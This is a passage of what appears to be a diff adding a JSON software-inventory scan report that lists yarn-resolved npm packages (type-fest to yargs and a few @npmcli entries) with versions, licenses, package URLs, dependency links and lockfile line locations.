], + "AnalyzedBy": "yarn" + }, + { + "ID": "type-fest@0.6.0", + "Name": "type-fest", + "Identifier": { + "PURL": "pkg:npm/type-fest@0.6.0", + "UID": "805e1b649f01aa3f" + }, + "Version": "0.6.0", + "Licenses": [ + "(MIT OR CC0-1.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10728, + "EndLine": 10731 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "type-fest@0.7.1", + "Name": "type-fest", + "Identifier": { + "PURL": "pkg:npm/type-fest@0.7.1", + "UID": "f0d90d2103742f1a" + }, + "Version": "0.7.1", + "Licenses": [ + "(MIT OR CC0-1.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10733, + "EndLine": 10736 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "type-fest@0.8.1", + "Name": "type-fest", + "Identifier": { + "PURL": "pkg:npm/type-fest@0.8.1", + "UID": "609758dea023219b" + }, + "Version": "0.8.1", + "Licenses": [ + "(MIT OR CC0-1.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10738, + "EndLine": 10741 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ua-parser-js@0.7.41", + "Name": "ua-parser-js", + "Identifier": { + "PURL": "pkg:npm/ua-parser-js@0.7.41", + "UID": "9902e86927b11d9e" + }, + "Version": "0.7.41", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10801, + "EndLine": 10804 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "uc.micro@1.0.6", + "Name": "uc.micro", + "Identifier": { + "PURL": "pkg:npm/uc.micro@1.0.6", + "UID": "f3d66c2ef8776946" + }, + "Version": "1.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10806, + "EndLine": 10809 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "undici-types@7.14.0", + "Name": "undici-types", + "Identifier": { + "PURL": "pkg:npm/undici-types@7.14.0", + "UID": "8163996ff4da1912" + }, + "Version": "7.14.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10821, + "EndLine": 10824 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unicode-canonical-property-names-ecmascript@2.0.1", + "Name": "unicode-canonical-property-names-ecmascript", + "Identifier": { + "PURL": "pkg:npm/unicode-canonical-property-names-ecmascript@2.0.1", + "UID": "389ad2ac5dd5da6e" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10826, + "EndLine": 10829 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unicode-match-property-ecmascript@2.0.0", + "Name": "unicode-match-property-ecmascript", + "Identifier": { + "PURL": "pkg:npm/unicode-match-property-ecmascript@2.0.0", + "UID": "4975aad3aca0d5b7" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "unicode-canonical-property-names-ecmascript@2.0.1", + "unicode-property-aliases-ecmascript@2.2.0" + ], + "Locations": [ + { + "StartLine": 10831, + "EndLine": 10837 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unicode-match-property-value-ecmascript@2.2.1", + "Name": "unicode-match-property-value-ecmascript", + "Identifier": { + "PURL": "pkg:npm/unicode-match-property-value-ecmascript@2.2.1", + "UID": "928a6362ba92eb24" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10839, + "EndLine": 10842 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unicode-property-aliases-ecmascript@2.2.0", + "Name": "unicode-property-aliases-ecmascript", + "Identifier": { + "PURL": "pkg:npm/unicode-property-aliases-ecmascript@2.2.0", + "UID": "85783527577c74ab" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10844, + "EndLine": 10847 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unique-filename@4.0.0", + "Name": "unique-filename", + "Identifier": { + "PURL": "pkg:npm/unique-filename@4.0.0", + "UID": "a2e8baabf6bdcfbc" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "unique-slug@5.0.0" + ], + "Locations": [ + { + "StartLine": 10856, + "EndLine": 10859 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unique-slug@5.0.0", + "Name": "unique-slug", + "Identifier": { + "PURL": "pkg:npm/unique-slug@5.0.0", + "UID": "da4fd8cfb12b39cb" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "imurmurhash@0.1.4" + ], + "Locations": [ + { + "StartLine": 10868, + "EndLine": 10871 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "universalify@0.1.2", + "Name": "universalify", + "Identifier": { + "PURL": "pkg:npm/universalify@0.1.2", + "UID": "cc2b2ac191984750" + }, + "Version": "0.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10873, + "EndLine": 10876 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "universalify@2.0.1", + "Name": "universalify", + "Identifier": { + "PURL": "pkg:npm/universalify@2.0.1", + "UID": "e90a3a8bd11f7549" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10878, + "EndLine": 10881 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unpipe@1.0.0", + "Name": "unpipe", + "Identifier": { + "PURL": "pkg:npm/unpipe@1.0.0", + "UID": "2ec2f7ad6e092be1" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10883, + "EndLine": 10886 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "update-browserslist-db@1.1.3", + "Name": "update-browserslist-db", + "Identifier": { + "PURL": "pkg:npm/update-browserslist-db@1.1.3", + "UID": "a978c45da4e056a5" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "escalade@3.2.0", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 10888, + "EndLine": 10894 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "use-latest-callback@0.2.5", + "Name": "use-latest-callback", + "Identifier": { + "PURL": "pkg:npm/use-latest-callback@0.2.5", + "UID": "16915f32992d4b43" + }, + "Version": "0.2.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10903, + "EndLine": 10906 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "use-sync-external-store@1.6.0", + "Name": "use-sync-external-store", + "Identifier": { + "PURL": "pkg:npm/use-sync-external-store@1.6.0", + "UID": "f430a609b7c0e20e" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10908, + "EndLine": 10911 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "utf8@3.0.0", + "Name": "utf8", + "Identifier": { + "PURL": "pkg:npm/utf8@3.0.0", + "UID": "8d39721178e4bcc4" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10913, + "EndLine": 10916 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "util@0.12.5", + "Name": "util", + "Identifier": { + "PURL": "pkg:npm/util@0.12.5", + "UID": "e631e86ac727e320" + }, + "Version": "0.12.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4", + "is-arguments@1.2.0", + "is-generator-function@1.1.2", + "is-typed-array@1.1.15", + "which-typed-array@1.1.19" + ], + "Locations": [ + { + "StartLine": 10928, + "EndLine": 10937 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "util-deprecate@1.0.2", + "Name": "util-deprecate", + "Identifier": { + "PURL": "pkg:npm/util-deprecate@1.0.2", + "UID": "f4cc801c9053ce08" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10923, + "EndLine": 10926 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "utils-merge@1.0.1", + "Name": "utils-merge", + "Identifier": { + "PURL": "pkg:npm/utils-merge@1.0.1", + "UID": "a50b98c8be3da15e" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10939, + "EndLine": 10942 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "utrie@1.0.2", + "Name": "utrie", + "Identifier": { + "PURL": "pkg:npm/utrie@1.0.2", + "UID": "1ee8c4fcc413306" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-arraybuffer@1.0.2" + ], + "Locations": [ + { + "StartLine": 10944, + "EndLine": 10949 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "uuid@3.4.0", + "Name": "uuid", + "Identifier": { + "PURL": "pkg:npm/uuid@3.4.0", + "UID": "aa933471abfe8c0f" + }, + "Version": "3.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10951, + "EndLine": 10954 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "uuid@7.0.3", + "Name": "uuid", + "Identifier": { + "PURL": "pkg:npm/uuid@7.0.3", + "UID": "5a74fe9a4bc16ef4" + }, + "Version": "7.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10956, + "EndLine": 10959 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "validate-npm-package-license@3.0.4", + "Name": "validate-npm-package-license", + "Identifier": { + "PURL": "pkg:npm/validate-npm-package-license@3.0.4", + "UID": "fb633a0c60501108" + }, + "Version": "3.0.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "spdx-correct@3.2.0", + "spdx-expression-parse@3.0.1" + ], + "Locations": [ + { + "StartLine": 10978, + "EndLine": 10982 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "validate-npm-package-name@6.0.2", + "Name": "validate-npm-package-name", + "Identifier": { + "PURL": "pkg:npm/validate-npm-package-name@6.0.2", + "UID": "2deace2ff33ecc2e" + }, + "Version": "6.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10984, + "EndLine": 10985 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "vlq@1.0.1", + "Name": "vlq", + "Identifier": { + "PURL": "pkg:npm/vlq@1.0.1", + "UID": "9a71092536a69488" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10992, + "EndLine": 10995 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "walk-up-path@4.0.0", + "Name": "walk-up-path", + "Identifier": { + "PURL": "pkg:npm/walk-up-path@4.0.0", + "UID": "fd40f837a9de5ff7" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10997, + "EndLine": 11000 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "walker@1.0.8", + "Name": "walker", + "Identifier": { + "PURL": "pkg:npm/walker@1.0.8", + "UID": "f36e07a208c2174a" + }, + "Version": "1.0.8", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "makeerror@1.0.12" + ], + "Locations": [ + { + "StartLine": 11002, + "EndLine": 11007 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "warn-once@0.1.1", + "Name": "warn-once", + "Identifier": { + "PURL": "pkg:npm/warn-once@0.1.1", + "UID": "73b0f8f66f9aba35" + }, + "Version": "0.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11009, + "EndLine": 11012 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "wcwidth@1.0.1", + "Name": "wcwidth", + "Identifier": { + "PURL": "pkg:npm/wcwidth@1.0.1", + "UID": "7772ed5c0fefe034" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "defaults@1.0.4" + ], + "Locations": [ + { + "StartLine": 11014, + "EndLine": 11019 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "web-vitals@4.2.4", + "Name": "web-vitals", + "Identifier": { + "PURL": "pkg:npm/web-vitals@4.2.4", + "UID": "7240e0e3843c191b" + }, + "Version": "4.2.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11021, + "EndLine": 11024 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "websocket-driver@0.7.4", + "Name": "websocket-driver", + "Identifier": { + "PURL": "pkg:npm/websocket-driver@0.7.4", + "UID": "c2dd1465a3e8a25e" + }, + "Version": "0.7.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "http-parser-js@0.5.10", + "safe-buffer@5.2.1", + "websocket-extensions@0.1.4" + ], + "Locations": [ + { + "StartLine": 11026, + "EndLine": 11033 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "websocket-extensions@0.1.4", + "Name": "websocket-extensions", + "Identifier": { + "PURL": "pkg:npm/websocket-extensions@0.1.4", + "UID": "a2259059ec216ce6" + }, + "Version": "0.1.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11035, + "EndLine": 11038 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "websql@2.0.3", + "Name": "websql", + "Identifier": { + "PURL": "pkg:npm/websql@2.0.3", + "UID": "6d93f7d26f8072c0" + }, + "Version": "2.0.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "argsarray@0.0.1", + "immediate@3.3.0", + "noop-fn@1.0.0", + "tiny-queue@0.2.1" + ], + "Locations": [ + { + "StartLine": 11040, + "EndLine": 11050 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "whatwg-fetch@3.6.20", + "Name": "whatwg-fetch", + "Identifier": { + "PURL": "pkg:npm/whatwg-fetch@3.6.20", + "UID": "3431059cdf0c13f" + }, + "Version": "3.6.20", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11052, + "EndLine": 11055 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "which@2.0.2", + "Name": "which", + "Identifier": { + "PURL": "pkg:npm/which@2.0.2", + "UID": "334194cdd694f77c" + }, + "Version": "2.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "isexe@2.0.0" + ], + "Locations": [ + { + "StartLine": 11115, + "EndLine": 11120 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "which@5.0.0", + "Name": "which", + "Identifier": { + "PURL": "pkg:npm/which@5.0.0", + "UID": "ec43aa4d4fb51128" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "isexe@3.1.1" + ], + "Locations": [ + { + "StartLine": 11122, + "EndLine": 11125 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "which-typed-array@1.1.19", + "Name": "which-typed-array", + "Identifier": { + "PURL": "pkg:npm/which-typed-array@1.1.19", + "UID": "11729a652496d784" + }, + "Version": "1.1.19", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "available-typed-arrays@1.0.7", + "call-bind@1.0.8", + "call-bound@1.0.4", + "for-each@0.3.5", + "get-proto@1.0.1", + "gopd@1.2.0", + "has-tostringtag@1.0.2" + ], + "Locations": [ + { + "StartLine": 11102, + "EndLine": 11113 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "wide-align@1.1.5", + "Name": "wide-align", + "Identifier": { + "PURL": "pkg:npm/wide-align@1.1.5", + "UID": "a699b13841d8b59f" + }, + "Version": "1.1.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3" + ], + "Locations": [ + { + "StartLine": 11127, + "EndLine": 11132 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "wrap-ansi@7.0.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@7.0.0", + "UID": "bfd64715b1b2b538" + }, + "Version": "7.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@4.3.0", + "string-width@4.2.3", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 11157, + "EndLine": 11164 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "wrap-ansi@8.1.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@8.1.0", + "UID": "1d9838213bbd039e" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@6.2.3", + "string-width@5.1.2", + "strip-ansi@7.1.2" + ], + "Locations": [ + { + "StartLine": 11166, + "EndLine": 11173 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "wrap-ansi-cjs@7.0.0", + "Name": "wrap-ansi-cjs", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi-cjs@7.0.0", + "UID": "d415b6d02ef3ffef" + }, + "Version": "7.0.0", + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@4.3.0", + "string-width@4.2.3", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 11139, + "EndLine": 11146 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "wrappy@1.0.2", + "Name": "wrappy", + "Identifier": { + "PURL": "pkg:npm/wrappy@1.0.2", + "UID": "b441b106b06717fe" + }, + "Version": "1.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11175, + "EndLine": 11178 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "write-file-atomic@4.0.2", + "Name": "write-file-atomic", + "Identifier": { + "PURL": "pkg:npm/write-file-atomic@4.0.2", + "UID": "3945b8e8e726b05e" + }, + "Version": "4.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "imurmurhash@0.1.4", + "signal-exit@3.0.7" + ], + "Locations": [ + { + "StartLine": 11180, + "EndLine": 11186 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "write-file-atomic@6.0.0", + "Name": "write-file-atomic", + "Identifier": { + "PURL": "pkg:npm/write-file-atomic@6.0.0", + "UID": "2cc9f64f07af98e5" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "imurmurhash@0.1.4", + "signal-exit@4.1.0" + ], + "Locations": [ + { + "StartLine": 11188, + "EndLine": 11192 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ws@6.2.3", + "Name": "ws", + "Identifier": { + "PURL": "pkg:npm/ws@6.2.3", + "UID": "6bc8bbb6f4efc657" + }, + "Version": "6.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "async-limiter@1.0.1" + ], + "Locations": [ + { + "StartLine": 11194, + "EndLine": 11199 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ws@7.5.10", + "Name": "ws", + "Identifier": { + "PURL": "pkg:npm/ws@7.5.10", + "UID": "cbdf22169dab72fa" + }, + "Version": "7.5.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11206, + "EndLine": 11209 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "x-path@0.0.2", + "Name": "x-path", + "Identifier": { + "PURL": "pkg:npm/x-path@0.0.2", + "UID": "879cf060769f5acd" + }, + "Version": "0.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "path-extra@1.0.3" + ], + "Locations": [ + { + "StartLine": 11211, + "EndLine": 11216 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "xcode@2.1.0", + "Name": "xcode", + "Identifier": { + "PURL": "pkg:npm/xcode@2.1.0", + "UID": "fdcdd0439d73c36f" + }, + "Version": "2.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "simple-plist@1.3.1", + "uuid@3.4.0" + ], + "Locations": [ + { + "StartLine": 11218, + "EndLine": 11224 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "xcode@3.0.1", + "Name": "xcode", + "Identifier": { + "PURL": "pkg:npm/xcode@3.0.1", + "UID": "3fbc9f1d62de060f" + }, + "Version": "3.0.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "simple-plist@1.3.1", + "uuid@7.0.3" + ], + "Locations": [ + { + "StartLine": 11226, + "EndLine": 11232 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "xml-formatter@3.6.7", + "Name": "xml-formatter", + "Identifier": { + "PURL": "pkg:npm/xml-formatter@3.6.7", + "UID": "3fcb0a0573491034" + }, + "Version": "3.6.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "xml-parser-xo@4.1.5" + ], + "Locations": [ + { + "StartLine": 11234, + "EndLine": 11239 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "xml-parser-xo@4.1.5", + "Name": "xml-parser-xo", + "Identifier": { + "PURL": "pkg:npm/xml-parser-xo@4.1.5", + "UID": "de8efffd34d25cbb" + }, + "Version": "4.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11241, + "EndLine": 11244 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "xml2js@0.6.0", + "Name": "xml2js", + "Identifier": { + "PURL": "pkg:npm/xml2js@0.6.0", + "UID": "3b0713791c0c4a59" + }, + "Version": "0.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "sax@1.4.1", + "xmlbuilder@11.0.1" + ], + "Locations": [ + { + "StartLine": 11246, + "EndLine": 11252 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "xmlbuilder@11.0.1", + "Name": "xmlbuilder", + "Identifier": { + "PURL": "pkg:npm/xmlbuilder@11.0.1", + "UID": "2d523124ce0ad32f" + }, + "Version": "11.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11259, + "EndLine": 11262 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "xmlbuilder@15.1.1", + "Name": "xmlbuilder", + "Identifier": { + "PURL": "pkg:npm/xmlbuilder@15.1.1", + "UID": "3b4c1d9bddb5a559" + }, + "Version": "15.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11254, + "EndLine": 11257 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "y18n@5.0.8", + "Name": "y18n", + "Identifier": { + "PURL": "pkg:npm/y18n@5.0.8", + "UID": "b7e5476537afc9b9" + }, + "Version": "5.0.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11269, + "EndLine": 11272 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yallist@3.1.1", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@3.1.1", + "UID": "425be8eac1de9db9" + }, + "Version": "3.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11274, + "EndLine": 11277 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yallist@4.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@4.0.0", + "UID": "128600f1dca3d5ef" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11279, + "EndLine": 11282 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yallist@5.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@5.0.0", + "UID": "5bd8c594790f2b10" + }, + "Version": "5.0.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11284, + "EndLine": 11285 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yaml@2.8.1", + "Name": "yaml", + "Identifier": { + "PURL": "pkg:npm/yaml@2.8.1", + "UID": "a31a701f2d1ece72" + }, + "Version": "2.8.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11287, + "EndLine": 11290 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yargs@16.2.0", + "Name": "yargs", + "Identifier": { + "PURL": "pkg:npm/yargs@16.2.0", + "UID": "8bda249fb9d6b48e" + }, + "Version": "16.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cliui@7.0.4", + "escalade@3.2.0", + "get-caller-file@2.0.5", + "require-directory@2.1.1", + "string-width@4.2.3", + "y18n@5.0.8", + "yargs-parser@20.2.9" + ], + "Locations": [ + { + "StartLine": 11332, + "EndLine": 11343 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yargs@17.7.2", + "Name": "yargs", + "Identifier": { + "PURL": "pkg:npm/yargs@17.7.2", + "UID": "87a0138afb1109f7" + }, + "Version": "17.7.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cliui@8.0.1", + "escalade@3.2.0", + "get-caller-file@2.0.5", + "require-directory@2.1.1", + "string-width@4.2.3", + "y18n@5.0.8", + "yargs-parser@21.1.1" + ], + "Locations": [ + { + "StartLine": 11345, + "EndLine": 11356 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yargs-parser@20.2.9", + "Name": "yargs-parser", + "Identifier": { + "PURL": "pkg:npm/yargs-parser@20.2.9", + "UID": "752a914d17b416e4" + }, + "Version": "20.2.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11305, + "EndLine": 11308 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yargs-parser@21.1.1", + "Name": "yargs-parser", + "Identifier": { + "PURL": "pkg:npm/yargs-parser@21.1.1", + "UID": "e0e858e4becd4c8" + }, + "Version": "21.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11310, + "EndLine": 11313 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "yocto-queue@0.1.0", + "Name": "yocto-queue", + "Identifier": { + "PURL": "pkg:npm/yocto-queue@0.1.0", + "UID": "7ba71225ac1aa6ca" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11358, + "EndLine": 11361 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@gar/promisify@1.1.3", + "Name": "@gar/promisify", + "Identifier": { + "PURL": "pkg:npm/%40gar/promisify@1.1.3", + "UID": "ccc2d7f6bf953133" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Locations": [ + { + "StartLine": 1548, + "EndLine": 1551 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/fs@1.1.1", + "Name": "@npmcli/fs", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/fs@1.1.1", + "UID": "a3eb8c0dce1e341d" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "@gar/promisify@1.1.3", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 2000, + "EndLine": 2006 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/move-file@1.1.2", + "Name": "@npmcli/move-file", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/move-file@1.1.2", + "UID": "b5dbe73ce0bdaa8c" + }, + "Version": "1.1.2", + 